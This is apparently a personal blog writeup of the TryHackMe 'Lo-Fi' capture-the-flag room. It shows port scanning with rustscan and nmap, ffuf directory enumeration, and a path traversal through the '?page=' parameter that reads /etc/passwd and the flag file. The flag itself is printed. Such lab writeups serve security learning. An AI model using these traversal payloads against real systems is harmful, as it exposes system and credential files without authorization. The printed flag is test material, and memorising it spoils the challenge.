wellcome to lo-fi tryhackme challange , i just simple writeup for it , without to much explanations
first of all , I going to scan network , so I will use rustscan first because rust scan much faster , after that I use nmap scan for detailed scanning
rustscan -a <ip>
scan result
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
after that scan using nmap
nmap -sV -vvv -p22,80 10.10.173.193
nmap scan results
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.01 seconds
thats it ok , now just explore the port 80

Gathering information
information gathering is the most important step for CTF, after gathering information only we can move to further steps
so analysing what are technologies used in this website using wappalyzer

Directory enum / Hidden directory Enum
then I am going to get directory enumaration
ffuf -u http://10.10.173.193/FUZZ -w /home/ducky/wordlists/SecLists/Discovery/Web-Content/common.txt
scan result
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.173.193/FUZZ
:: Wordlist : FUZZ: /home/ducky/wordlists/SecLists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 3715ms]
.hta [Status: 403, Size: 285, Words: 21, Lines: 11, Duration: 3716ms]
.htpasswd [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 4753ms]
index.php [Status: 200, Size: 4162, Words: 1375, Lines: 128, Duration: 235ms]
server-status [Status: 403, Size: 294, Words: 21, Lines: 11, Duration: 245ms]
:: Progress: [4746/4746] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:35] :: Errors: 0 ::
then analysing source code in this website, we can find some enpoints

when I click this link it get source code from specific location like this
http://10.10.173.193/?page=relax.php
so lets try the path traversal vulnerability ,
http://10.10.173.193/?page=../../../../../../../../../etc/passwd
boom I got it

just ii try this and i got flag
http://10.10.173.193/?page=../../../../../flag.txt
flag is
flag{e4478e0eab69bd642b8238765dcb7d18}

thank you for reading my blog post , i will see you in another blog
my some blog posts
My other projects with source code
- 10 Best Final Year Cybersecurity Project Ideas with source code.
- Interactive Snake Game Using OpenCV & Hand Tracking
- Build a URL Shortener with Python, Flask & MySQL, Tailwindcss
-
Lo-Fi TryHackMe Writeup
wellcome to lo-fi tryhackme challange , i just simple writeup for it , without to much explanations first of all […]
-
Tryhackme W1seGuy walkthrough
welcome to my blog i am aathil ducky in this blog post i am going to write blog post for […]
-
How to Install and Use LocalSend on Arch Linux and Mobile
Introduction Ever tried emailing a file to yourself just to move it between devices? Yeah, me too. I’m Aathil Ducky, […]
-
I created CLI tool for convert image Webp format
wellcome to my blog. in this blog i am going to tell about image to webp converter. i already create […]
-
How to install Brave Browser on arch linux
wellcome to my blogpost after log time i write blog post , its just simple blog post for how to […]